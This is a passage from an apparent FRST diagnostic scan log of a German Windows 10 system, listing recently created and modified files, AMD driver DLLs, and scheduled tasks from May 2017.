2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-05-07 18:11 - 2017-05-07 18:11 - 00000000 ____D C:\Windows.old
2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-05-07 17:23 - 2017-05-17 21:27 - 01963832 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-05-07 17:17 - 2017-05-17 21:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-05-07 17:17 - 2017-05-07 17:17 - 00023140 _____ C:\WINDOWS\System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003084 _____ C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908}
2017-05-07 17:17 - 2017-05-07 17:17 - 00002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician
2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared
2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino
2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten
2017-05-07 17:13 - 2017-05-17 21:20 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD
2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-05-07 17:13 - 2017-05-10 21:46 - 00351440 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS
2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys
2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP
2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP
2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew
2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini
2017-05-19 14:18 - 2016-12-17 13:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Games
2017-05-19 14:18 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla
2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-19 13:51 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-05-19 13:51 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive
2017-05-18 22:50 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-18 21:09 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-18 21:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-05-17 21:27 - 2017-03-20 06:41 - 00862082 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-17 21:27 - 2017-03-20 06:41 - 00179772 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-17 21:22 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-05-17 21:20 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-05-17 21:20 - 2017-02-05 21:38 - 00013346 _____ C:\bdlog.txt
2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD
2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-05-09 21:42 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-05-09 21:40 - 2015-05-01 17:30 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages
2017-05-09 21:23 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-08 22:37 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-05-07 17:16 - 2017-03-14 00:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017
2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia
2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016
2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung
2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II
2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo
2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician
2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
